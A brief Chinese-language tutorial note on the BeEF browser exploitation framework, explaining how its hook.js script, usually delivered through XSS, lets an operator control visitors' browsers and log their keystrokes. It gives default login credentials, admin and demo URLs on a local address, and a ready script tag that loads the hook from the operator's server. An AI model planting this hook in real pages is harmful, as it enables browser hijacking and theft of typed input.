beef
Beef主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问了有hook.js(钩子)的页面,就会被hook(勾住),勾连的浏览器会执行初始代码返回一些信息,接着目标主机会每隔一段时间(默认为1秒)就会向BeEF服务器发送一个请求,询问是否有新的代码需要执行
Beef服务器本质上就像一个Web应用,被分为前端和后端。前端会轮询后端是否有新的数据需要更新,同时前端也可以向后端发送指示, BeEF持有者可以通过浏览器来登录 BeEF 的后端,来控制前端(用户的浏览器)
Beef一般和XSS漏洞结合使用,使目标主机执行带有js的文件,但只能控制一个页面
默认账号密码beef
登录之后,浏览器输入http://192.168.3.59:3000/demos/butcher/index.html打开默认测试页面
Js脚本: < script src=“http://192.168.3.59:3000/hook.js”>< /script >
目标打开带有js脚本的文件后
然后beef中会看到被害者上线,可以进行控制,可以记录键盘输入
(浏览器输入http://192.168.3.59:3000/ui/panel)